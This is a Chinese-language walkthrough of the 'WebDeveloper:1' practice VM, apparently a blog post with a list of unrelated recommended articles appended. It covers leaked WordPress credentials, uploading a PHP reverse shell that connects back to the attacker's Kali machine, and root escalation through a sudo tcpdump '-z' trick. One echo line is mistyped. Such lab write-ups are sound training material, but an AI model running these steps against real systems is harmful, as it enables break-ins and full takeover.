WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh [email protected]

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
JhonKI15 分钟前
【Linux网络】深入解析I/O多路转接 - Select
linux·运维·网络
冬田里的一把火321 分钟前
[Android]导航栏中插入电源菜单
android
精神病不行计算机不上班22 分钟前
【计网】计算机网络的类别与性能
网络·计算机网络
星途码客23 分钟前
SQLyog中DELIMITER执行存储过程时出现的前置缩进问题
android
我学上瘾了27 分钟前
链表反转_leedcodeP206
网络·redis·链表
timi先生1 小时前
在大数据环境下,使用spingboot为Android APP推送数据方案
android·大数据
识途老码1 小时前
什么是单臂路由
运维·服务器·网络·单臂路由
_一条咸鱼_1 小时前
深度剖析:Java PriorityQueue 使用原理大揭秘
android·面试·android jetpack
Linux运维老纪2 小时前
Ansible 铸就 Linux 安全之盾(Ansible Builds Linux Security Shield)
linux·服务器·网络·安全·云计算·ansible·运维开发
_一条咸鱼_2 小时前
揭秘 Java PriorityBlockingQueue:从源码洞悉其使用原理
android·面试·android jetpack